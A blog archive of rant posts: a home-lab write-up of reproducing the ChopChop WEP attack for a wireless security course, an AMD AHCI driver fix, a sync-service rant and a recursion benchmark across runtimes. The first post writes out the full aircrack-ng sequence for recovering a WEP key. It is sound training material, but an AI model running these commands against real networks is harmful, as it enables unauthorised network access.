Category Archives: Rant

Reproducing KoreK’s ChopChop attack is a pain in the ass

Well, getting a Netgear WNR1000v2, one of the access points recommended by WiFu, was also a pain in the ass since the product is EOL. Imagine my surprise when I couldn't reproduce this particular attack because the AP was not properly dropping packets with an invalid ICV.

I started to dig for some information. The product that I got was so old that it was basically one of those unsold units. It came with the only firmware still available on Netgear's support site that features WEP support. Actually, the only one who mentions this product in relation to WiFu is Samiux. The WNR1000v2h2 is basically a WNR1000v2, but with an internal antenna.

The things that I tried, but utterly failed

I tried the Netgear WNR1000v2 AP with firmware versions 1.0.1.1 (the version that was installed on it), 1.0.1.1NA (basically the same as the previous one, but region-locked to the USA so it sticks to the FCC's emission regulations), and 1.1.2.28 (which does not feature WEP support).

I dug up my retired ASUS WL-500g Premium. Tried the attack with the following firmwares: OpenWrt 12.09 (I built the attitude_adjustment branch myself a few months ago due to the unstable b43 driver at the time of the 12.09 release), OpenWrt 10.03 brcm-2.4 (Linux 2.4.40, Broadcom STA / wl driver), and the first factory firmware available on ASUS' support site, v1.9.6.9. None of them worked. OpenWrt 12.09 and the factory firmware created the illusion that it works, only to fail a few seconds later.

I also tried to create a basic soft AP using hostapd. In reality, not all drivers and hardware are equal. While hostapd theoretically supports the nl80211 interface in order to talk to devices that use mac80211 drivers, only some of the chips that claim to support master mode can actually create a working AP.
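
A quick way to see what a given card claims to support is to look at the interface modes reported by iw; having "AP" in that list is necessary, but, as noted above, not always sufficient for a working soft AP:

# list the interface modes each wireless PHY claims to support;
# "* AP" must be present, although that alone is no guarantee it works
iw list | grep -A 8 "Supported interface modes"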

My first try was a proof of concept on a Raspberry Pi, but it didn't work as I was using my portable stuff instead of the toys that stay at home in my proper Wi-Fi lab. I tried to create an AP using an Unex DNUA-93F, powered by AR9271, but I had nothing to test it with. While Kali works in VirtualBox on OS X, the USB support is spotty at best and this card is the only one that can be used with a certain degree of reliability. So I had to switch to an ALFA AWUS051NH, powered by RT2770. I could get reliable packet injection starting from a fragmentation attack, but no dice with ChopChop.

In my home lab I tried to create a proper soft AP on a machine which runs Kali but, as previously mentioned, not all hardware is equal. I tried to create an AP with the legendary ALFA AWUS036H, powered by RTL8187. For some reason, hostapd won't start with this card if WEP is in use. Running hostapd with -dd only added more confusion, so I switched to the built-in wireless interface, an AirForce One 54g, powered by BCM4318. The AP was created successfully, but every connected client failed to finish the authentication and the log was flooded with "wlan0: STA […] did not acknowledge authentication response". Which was odd, as the WL-500gP has the same Mini PCI card in it.

What finally worked

I created a soft AP using a TP-LINK TL-WN722N, powered by AR9271 (the same chip as the Unex DNUA-93F). For the internet connectivity I used the built-in AirForce One 54g to connect to my actual AP.

For the configuration I used the information from nims11's article about creating a soft AP, but I used dnsmasq as the DHCP server because dhcpd was being a pain in the ass (you can see a pattern here).

The hostapd config in /etc/hostapd/hostapd.conf:

interface=wlan2
driver=nl80211
ssid=wifu
hw_mode=g
channel=3
# accept all client MACs (no deny list configured)
macaddr_acl=0
# broadcast the SSID
ignore_broadcast_ssid=0
# open system authentication only
auth_algs=1
# static 40-bit WEP key, index 0
wep_default_key=0
wep_key0=AABBCCDDEE
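
Before wiring the config into any startup script, it can be sanity-checked by running hostapd in the foreground with debugging enabled (the same -dd switch mentioned earlier):

hostapd -dd /etc/hostapd/hostapd.conf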

The dnsmasq config in /etc/dnsmasq.conf:

# disables dnsmasq reading any other files like /etc/resolv.conf
no-resolv
# Interface to bind to
interface=wlan2
# Specify starting_range,end_range,lease_time
dhcp-range=10.0.0.3,10.0.0.20,12h
# dns addresses to send to the clients
server=8.8.8.8
server=8.8.4.4
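
dnsmasq can check this file for syntax errors without actually starting up:

dnsmasq --test -C /etc/dnsmasq.conf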

The initSoftAP script for starting everything up:

#!/bin/bash
#Initial wifi interface configuration
ifconfig $1 up 10.0.0.1 netmask 255.255.255.0
sleep 2
 
###########Start dnsmasq, modify if required##########
if [ -z "$(ps -e | grep dnsmasq)" ]
then
 dnsmasq
fi
###########
 
#Enable NAT
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $2 -j MASQUERADE
iptables --append FORWARD --in-interface $1 -j ACCEPT
 
sysctl -w net.ipv4.ip_forward=1
 
#start hostapd
hostapd /etc/hostapd/hostapd.conf
killall dnsmasq

I started it with ./initSoftAP wlan2 wlan0 (as root, obviously). I did the double NAT over Wi-Fi because I was too lazy to add another patch cable to the already crowded desktop. Otherwise, it would be ./initSoftAP wlan2 eth0.

I booted up my desktop machine, started Kali in a VirtualBox VM, and made the ALFA AWUS036H available inside the VM. Did the usual drill (airmon-ng, airodump-ng, etc.). I had to keep the antennas about 1.5 meters apart due to their radiation pattern.
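
The usual drill translates to something along these lines (the AWUS036H showing up as wlan0 inside the VM; the AP MAC is a placeholder, the channel and ESSID come from the hostapd config above):

# put the card into monitor mode (airmon-ng creates a monitor interface, mon0 on this version)
airmon-ng start wlan0
# watch the soft AP on channel 3 and write the captured traffic to wifu-01.cap
airodump-ng -c 3 --bssid <AP MAC> -w wifu mon0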

I used my phone as the testing client. I could browse the 'net and I got the 10.0.0.3 IP via DHCP, as instructed by dnsmasq. The ChopChop attack was running in unauthenticated mode, but the packets fetched from the phone as the client were not usable. In fact, I don't recall ever getting usable packets in unauthenticated mode.

I fired up another instance of aireplay-ng running fake auth and retried the ChopChop attack in authenticated mode. The first captured packet was a winner. Bam! I got the plaintext capture and the PRGA / xor file. A few minutes later, after creating an ARP packet with packetforge-ng and injecting it via interactive packet injection, I managed to crack the WEP key, therefore successfully completing the ChopChop challenge.
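
In aircrack-ng terms, the whole authenticated ChopChop dance boils down to something like this (MAC addresses are placeholders, and the .xor / .cap file names are whatever the tools generated in your run):

# fake authentication (-1) against the soft AP, kept alive in its own terminal
aireplay-ng -1 6000 -o 1 -q 10 -e wifu -a <AP MAC> -h <attacker MAC> mon0
# KoreK ChopChop (-4) in authenticated mode; yields the plaintext .cap and the PRGA .xor file
aireplay-ng -4 -b <AP MAC> -h <attacker MAC> mon0
# forge an ARP request with the recovered keystream
packetforge-ng -0 -a <AP MAC> -h <attacker MAC> -k 255.255.255.255 \
    -l 255.255.255.255 -y replay_dec-*.xor -w arp-request
# interactive packet replay (-2) of the forged ARP request to generate traffic
aireplay-ng -2 -r arp-request mon0
# crack the WEP key from the airodump-ng capture
aircrack-ng -b <AP MAC> wifu-01.cap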

The end

It took me two long days, but I did learn a lot. I think the WiFu lab can be reduced to my desktop machine running a couple of VirtualBox VMs (one for Kali, one for a soft AP), two Wi-Fi USB adapters, and a wireless client to play the victim role. This can be either a phone, a tablet, a notebook (which may double as the host machine for VirtualBox and the victim), or another VM plus another USB adapter. I think hunting for old hardware for this course is a flawed idea. Sure, the ALFA AWUS036H may still be useful after finishing this course, but the AP is going to be virtually useless.

Fixing the AMD AHCI drivers for SB7xx on Windows 7

I heard a lot of urban legends about the Windows Update service messing up your machine. Of course, I dismissed all of them with the classic "worksforme", as it never happened to me. Until Microsoft delivered a 3rd party driver update via an optional package. You know, the kind of stuff that comes from the vendor and isn't properly tested. I had the lack of inspiration to check that one too, instead of simply ignoring it like I usually do with Bing Desktop and Silverlight. The next thing was a BSOD at boot.

I had to disable AHCI in the BIOS and revert to IDE mode for the SATA ports. Which kinda sucks, for several reasons. The most important ones: SSD performance is hurt under IDE mode, the TRIM command won't work under IDE mode without 3rd party software since only the MSAHCI driver implements TRIM starting with Windows 7, and my HDD array doesn't support NCQ under IDE mode.

When it comes to drivers, AMD is still a shitty company. What's more, their engineers didn't grasp the concept of backward compatibility. Uninstalling the driver that broke my installation and installing a driver that works proved to be a non-trivial task. Fortunately, I found this post on pchelpforum.com.

For the sake of avoiding the link rot, I’m going to reproduce the essentials for posterity, with the same disclaimer as the original – you’re on your own if you mess up your machine and I’m not taking any responsibility if you follow these:

  • Delete any older version of the amd_ahci driver from here: C:\Windows\System32\DriverStore\FileRepository. The folders with older AMD AHCI drivers are named something like amd_sata.inf_amd64_neutral_c85cc6046149a413 (i386 on 32-bit, and most probably another hash). In order to remove the directory, you need to either elevate your explorer / shell to SYSTEM privileges, or take ownership of the driver directory, add the proper permissions, then delete it.
  • From HKLM\SYSTEM\CurrentControlSet\services delete amd_sata and amd_xsata. There's no need to remove the entries without the underscore (amdsata and amdxsata).
  • Reboot the computer. Don't change from IDE to AHCI yet. The driver that actually worked for my combination (AMD 780G / SB700) is this one. Execute the installer, wait till it finishes copying the files to C:\ATI\Support, then cancel the setup when the Catalyst installer starts.
  • Open the Device Manager. Action » Add legacy hardware » Advanced mode » Show All Devices » Have Disk. Browse to the extraction path of the above package: C:\ATI\Support\11-12_vista32-64_ahci\Packages\Drivers\SBDrv\SB7xx\AHCI. There are a couple of directories: LH (32-bit) and LH64A (64-bit). Select "AMD SATA Controller", then continue. Unlike the author of the original material, I didn't get an error about the device not starting.
  • Reboot the computer. Don't change from IDE to AHCI yet. Go to the Device Manager. Under IDE ATA/ATAPI controllers there should be at least one entry with a yellow exclamation mark, AMD SATA Controller. Uninstall "AMD SATA Controller" without checking "Delete the driver software for this device". Reboot the machine.
  • Go to BIOS, enable AHCI. After boot, the OS installs the proper drivers, then prompts for another reboot. Reboot the machine. Done.

In my case, it simply fixed the driver installation broken by the failed Windows Update, as the driver that now runs on my machine is from 2013 while the driver used in the above steps is from 2011. The drivers from the latest Catalyst, 13.4, failed to install either via the "Add legacy hardware" method or via a standard Catalyst setup.

[Screenshot: AMD SATA Controller in Device Manager]

Some benchmarks with an SSD drive under IDE mode:

[Screenshots: SSD benchmarks under IDE mode]

And some benchmarks under AHCI mode:

[Screenshots: SSD benchmarks under AHCI mode]

I guess the sharp drop was due to TRIM doing its job. Yes, it’s enabled:

[Screenshot: TRIM is enabled]

Doing what Dropbox is doing and doing it wrong

Let's take a couple of examples. I switched from an older machine recently, therefore I need to set up all my stuff. As I don't like to depend on a single service, for redundancy's sake I also keep a backup of my Dropbox.

SpiderOak – backs up stuff, uses client-side encryption, has optional sync between your machines. So far, so good. In the latest OS X client, at least, the possibility to paste the password is missing. Thanks, I'll use my password manager with services that don't do such a braindead thing instead. Seriously, there's a thing that actually improves the security of password authentication. It is called two-factor authentication. Dropbox has it. Google has it. In fact, any decent service has it. Disabling the possibility to paste the password, not so much.

Google Drive – you didn't think I was letting Google off the hook this time, did you? As I don't trust these sync services with my data, I always do client-side encryption. Dropbox doesn't choke on it, SpiderOak doesn't choke on it. Google Drive must be a special kind of breed, as it chokes on my encrypted files with "Upload Error – An unknown issue has occurred". Gee, let me fix the error message for you: "your piece of shit encrypted files aren't of any use for us, there's no personal info there". Was it that difficult? Thanks, but the market is full of alternatives. Seriously Google, you could do better than this "not being evil" thing.

Will it recur? Part 2: in-depth analysis

The social experiment

This first chapter is not about recursion. One member of the community wrote that certain inflammatory statements that I use may upset people. I replied with: "buzz marketing". Neutral articles, with neutral titles, written by nobodies like me, gain zero traction, even though what I write may be technically sound. Cheap journalism has more success. I even have the graphs to prove it now.

The second thing is the usefulness of my little experiment. I don't know about others, but curiosity was the main thing behind the whole benchmark. If it isn't useful for some people, that doesn't mean it isn't useful for others.

The other thing: the lack of tail recursion. I mean, do you need a "DUH" award or something? The whole point of a "bad" algorithm that's mathematically correct (well, almost; I stated that fibonacci(0) is wrong) is to show how smart specific compilers are about recursion. The rest simply brute-force it.

Patterns that emerge

The numbers say something if you know how to read the page. There are runtimes that are optimized for doing proper recursion without bothering the programmer with it: C, D, PyPy, V8, LuaJIT, JVM. The rest aren’t: PHP, CPython, Ruby, Perl, Lua. PyPy and V8 could do better. LuaJIT is already close to the speed of unoptimized C and D. V8 isn’t the king of the hill if you take Ruby (MRI / KRI), CPython, plain Lua VM, and PHP (Zend Engine) out of the equation. This may be another opportunity to get bashed by the node.js benchmark police with “this is irrelevant” statements, although this wasn’t something that I wanted to prove.

The thing is, for most web development I rarely needed to actually solve purely recursive problems. At most a fairly simple tree. Sometimes even that simple tree didn't actually require recursion. Therefore I get why some don't optimize for this specific case, even though they refer to the thing as "a general purpose language".

For the "write better algorithms" crowd … WHY? Doesn't the difference between C's 0.6 seconds and Ruby's 5 minutes ring any bell that some things are fundamentally flawed regarding recursion?

As for the edge cases, there are 3rd party libraries that solve this issue without bothering the programmer. Or, for other edge cases, such as applications that do complicated stuff operating at Google-like scale, there are better tools that most mere mortals won't use. The fact that some implementations do poor recursion is indeed irrelevant when the problems you're trying to solve don't include this.

In the end

Initially I wanted to try more stuff such as factorial, Euclid’s GCD, or the Ackermann function, for example. Try them on runtimes that don’t take longer than the next ice age to return a value. But why bother, except maybe to give the “one true way of doing recursion in functional languages” programmers a reason to bash stuff without returning any useful output. Not even an academic paper. It’s not productive.

But the question is: will it recur? Part 1: fibonacci(40)

A rant, maybe a bad rant due to babbling about philosophical reasons, made me wonder how the programming languages stack up against this stuff: recursion. Or should I say the runtimes, since the programming language itself is nothing but a bunch of text. I know that the algorithm itself is bad, but that's the whole point. I know that fibonacci(0) yields a wrong result (the n < 2 base case returns 1 instead of 0), but for the sake of laziness, I kept the original algorithm.

The source code of all the tests is available here in order to make the tests reproducible. There wasn't a high number of runs, particularly for the runtimes that take longer than the next ice age. But the results are pretty consistent for specific runtimes. The relevant system specs are: Ubuntu 10.04 amd64 (up to date), Q9400 CPU.
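
If anyone wants more runs, a dumb shell loop over each benchmark does the trick, for example:

# time a few consecutive runs of one of the benchmarks, e.g. the node.js one
for i in 1 2 3; do
    time node fib.js
done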

Now, less talk, more results.

JavaScript (node.js/V8)

node -v: v0.4.12
time node fib.js
node fib.js 6.40s user 0.02s system 99% cpu 6.423 total
node fib.js 6.39s user 0.02s system 99% cpu 6.410 total

It may seem slow, but for a language with dynamic typing, it puts the rest of the same category to shame. Or most of them. Bear with me.

PHP

php -v: PHP 5.3.8 (cli)
time php fib.php
php fib.php 77.57s user 0.06s system 99% cpu 1:17.66 total
php fib.php 78.05s user 0.07s system 99% cpu 1:18.18 total

Compared to the V8 runtime, PHP seems to take an eternity. As it happens, PHP isn't bad at recursion because it uses the stack, but because of the sheer lack of speed of the runtime. But we're not even halfway there. Stay tuned. PHP isn't the only thing that sucks at recursion.

C

gcc -v: gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5)
make fib
time ./fib
./fib 2.84s user 0.00s system 100% cpu 2.840 total
./fib 2.84s user 0.00s system 100% cpu 2.835 total

It wasn't a surprise that C came up with this result. Which makes the V8 result even more interesting.

Edit:
Forgot about the compiler optimization. Caught by Jabbles on HN.

gcc -O4 fib.c -o fib
time ./fib
./fib 0.65s user 0.01s system 100% cpu 0.657 total
gcc -O3 fib.c -o fib
time ./fib
./fib 0.66s user 0.00s system 100% cpu 0.657 total
gcc -O2 fib.c -o fib
time ./fib
./fib 1.54s user 0.00s system 100% cpu 1.535 total
gcc -O1 fib.c -o fib
time ./fib
./fib 0.00s user 0.00s system 0% cpu 0.001 total
time ./fib
165580141
./fib 2.06s user 0.00s system 99% cpu 2.060 total

For some reason, the O1 flag hates this code; most likely the unused result gets optimized away entirely, hence the 0.001 seconds. Printing fibonacci(40) forces the computation and yields a result closer to the one without any O flag. This brings C past the Java result, but only for O3+.
/End Edit.

Lua

lua -v: Lua 5.1.4
time lua fib.lua
lua fib.lua 28.02s user 0.03s system 99% cpu 28.081 total
lua fib.lua 28.86s user 0.02s system 99% cpu 28.883 total

./luajit -v: LuaJIT 2.0.0-beta8
time ./luajit fib.lua
./luajit fib.lua 10.59s user 0.00s system 99% cpu 10.591 total
./luajit fib.lua 10.58s user 0.01s system 99% cpu 10.610 total

Tested both of the implementations that I know of. I guess this article isn’t that funny for the generations of Lua coders that laugh about V8 in somebody’s face. Don’t get me wrong, I like Lua due to its simplicity, but in the speed realm, I still need to do some tests to verify some of those claims that sometimes appear to be overly inflated.

Edit:

With the following Lua script:

local function fibonacci(n)
	if n < 2 then
		return 1
	else
		return fibonacci(n - 2) + fibonacci(n - 1)
	end
end
fibonacci(40)

the results are getting better:

time lua fib.lua
lua fib.lua 24.17s user 0.08s system 99% cpu 24.281 total
lua fib.lua 24.24s user 0.01s system 99% cpu 24.307 total

[with LuaJIT v2.0.0-beta8 GIT HEAD]
time ./luajit fib.lua
./luajit fib.lua 2.02s user 0.00s system 99% cpu 2.026 total
./luajit fib.lua 2.02s user 0.00s system 99% cpu 2.023 total

Now, some of the Lua chops can have a lulz about V8. This project is getting more interesting, especially for pairing LuaJIT with luafcgid. I forgot about the local keyword since my Lua experience is limited to basic testing. Nice comeback!

/End Edit.

Python

python -V: Python 2.6.5
time python fib.py
python fib.py 59.42s user 0.02s system 99% cpu 59.494 total
python fib.py 59.27s user 0.05s system 99% cpu 59.375 total

./configure
make -j 4
./python -V: Python 2.7.2
time ./python fib.py
./python fib.py 61.29s user 0.03s system 99% cpu 1:01.35 total
./python fib.py 61.38s user 0.06s system 99% cpu 1:01.48 total

./configure
make -j 4
./python -V: Python 3.2.2
./python fib.py 71.23s user 0.08s system 99% cpu 1:11.33 total
./python fib.py 70.31s user 0.06s system 99% cpu 1:10.39 total

./pypy -V
Python 2.7.1 (d8ac7d23d3ec, Aug 17 2011, 11:51:19)
[PyPy 1.6.0 with GCC 4.4.3]
./pypy fib.py 4.61s user 0.07s system 99% cpu 4.708 total
./pypy fib.py 4.81s user 0.01s system 99% cpu 4.853 total

I happen to have 2.6.5 around because Ubuntu says so. But in order to make the potential trolls STFU about not using the latest versions, I made some fresh builds of 2.7.2 and 3.2.2. It gets even suckier with recent versions. In fact, the CPython runtime is struggling to catch up with the PHP runtime in the slowness realm. The only Python runtime that is actually impressive at this recursion stuff is PyPy. Which brings me back to my first statement: the language is just a bunch of text. The runtime is the piece that sucks or does not suck. PyPy proves that, with talented people shepherding the project, the language of the runtime implementation is quite irrelevant. This is also the first JIT implementation here that passes V8.

Ruby

ruby -v: ruby 1.8.7 (2010-01-10 patchlevel 249) [x86_64-linux]
time ruby fib.rb
ruby fib.rb 233.40s user 66.94s system 99% cpu 5:00.55 total
ruby fib.rb 231.75s user 68.08s system 99% cpu 4:59.99 total

./configure
make -j 4
./miniruby -v: ruby 1.9.3dev (2011-09-23 revision 33323) [x86_64-linux]
time ./miniruby fib.rb
./miniruby fib.rb 36.05s user 0.01s system 99% cpu 36.073 total
./miniruby fib.rb 35.92s user 0.04s system 99% cpu 35.978 total

Every time a Ruby fan says "thou shalt not care about the runtime speed", it makes me laugh so hard I almost burst into tears. Seriously, I couldn't imagine that MRI sucks that hard at recursion. I barely had the patience to even run this code. KRI washes away part of the shame though, scoring close to the plain Lua implementation. If you're asking why I used the miniruby binary, the reason is that the ruby binary complained about not having rubygems.rb, and I am bad at figuring out what's missing from a Ruby stack. But miniruby made fib.rb work.

Perl

perl -v: This is perl, v5.10.1 (*) built for x86_64-linux-gnu-thread-multi
time perl fib.pl
perl fib.pl 125.60s user 0.17s system 99% cpu 2:05.92 total
perl fib.pl 124.06s user 0.10s system 99% cpu 2:04.20 total

./Configure [accepted all defaults, specifically built without threading]
make
./perl -v: This is perl 5, version 14, subversion 2 (v5.14.2) built for x86_64-linux
./perl fib.pl 100.12s user 0.09s system 99% cpu 1:40.29 total
./perl fib.pl 100.38s user 0.05s system 99% cpu 1:40.63 total

At first I didn't want to bother with Perl, but then I remembered the legions of Perl fans ranting about PHP's recursion. I know that this is an inflammatory statement, but next time, people, please keep up with the facts. I guess you aren't that smug now.

D

gdc -v: gcc version 4.3.4 (Ubuntu 1:1.046-4.3.4-3ubuntu1)
gdc -o fib fib.c (same source as the C binary)
time ./fib
./fib 2.82s user 0.00s system 100% cpu 2.817 total
./fib 2.82s user 0.00s system 100% cpu 2.814 total

Predictable results from a language in the same family as C/C++. A slightly faster binary than the C version (despite the same source code), but I guess most people won't notice.

Java

javac -version: gcj-4.4 (Ubuntu 4.4.3-1ubuntu4.1) 4.4.3
java -version
java version "1.6.0_20"
OpenJDK Runtime Environment (IcedTea6 1.9.9) (6b20-1.9.9-0ubuntu1~10.04.2)
OpenJDK 64-Bit Server VM (build 19.0-b09, mixed mode)
javac fib.java
time java fib
java fib 0.86s user 0.02s system 99% cpu 0.882 total
java fib 0.86s user 0.02s system 100% cpu 0.872 total

I admit that I sometimes used to tell this joke: knock! knock!; who's there?; [very long pause]; Java. I guess now is a good time to swallow my own words. Not only does Java put the other JIT implementations, and the rest of the VMs, to shame, it also obliterates the statically compiled C and D binaries at their own favorite game, aka runtime speed. My first reaction was: WTF, there's got to be a mistake! Printing some junk to STDIO confirmed the same results between C and Java. Newbie warning: this is my first Java application. No, really! Don't bash me for the lack of understanding of the static keyword; I don't know whether it actually helps the runtime. I managed to put together the code by reading how to write a simple HelloWorldApp. Experienced Java chops may explain it though.